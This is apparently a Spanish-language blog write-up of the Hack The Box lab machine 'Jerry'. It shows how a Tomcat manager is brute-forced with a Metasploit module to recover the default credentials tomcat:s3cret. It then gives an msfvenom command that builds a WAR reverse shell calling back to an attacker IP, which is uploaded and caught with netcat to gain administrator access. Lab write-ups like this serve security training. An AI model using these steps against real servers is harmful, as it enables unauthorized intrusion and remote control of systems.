Roskyfrosky


Jerry - Hack The Box

20 Nov 2018 » hackthebox

Nmap

Hoy os traigo el writeup de como resolver la máquina Jerry de Hackthebox. Como podéis ver la dificultad de la máquina es fácil.

[ 00 – Recon]

En primer lugar realizamos un escaneo de puertos para comprobar que servicios están corriendo en la máquina.

Nmap

Vemos que se está ejecutando un apache tomcat en el puerto 8080.

[ 01 – Getting Access]

Para poder acceder a la consola de gestión del tomcat, necesitamos un usuario y una contraseña. Para ello vamos a hacer fuerza bruta con el módulo de metasploit que contiene las contraseñas más típicas y por defecto usadas en tomcat:

use auxiliary/scanner/http/tomcat_mgr_login

Nmap

Tenemos suerte y vemos que encontramos las credenciales tomcat:s3cret. Una vez dentro de la consola de administración comprobamos que SO está ejecutando y la arquitectura del mismo.

Nmap

Se trata de un windows Server 2012 de 64 bits. Vamos a subir una shell mediante un fichero war. Para ello generamos la shell mediante el siguiente comando, utilizando msfvenom:

msfvenom -p windows/x64/shell/reverse_tcp LPORT=4444 LHOST=10.10.15.77 -f war > final.war

Ahora vamos al gestor de aplicaciones y subimos nuestro fichero final.war. Tendremos que desempaquetar el fichero en local, para comprobar el nombre que se ha generado para el fichero jsp de la shell.

Nmap

Ponemos a escuchar un netcat en el puerto que hemos definido en el comando, en este caso el puerto 4444, y visitamos el fichero a través del navegador para que se realice la conexión, y así obtener Shell:

Nmap

[ 02 – Priv. Esc.]

En este caso no hace falta escalar privilegios porque la reverse shell que hemos obtenido es de usuario adminsitrador

Nmap

Y podríamos leer las flags tanto de user como de root.

Related Posts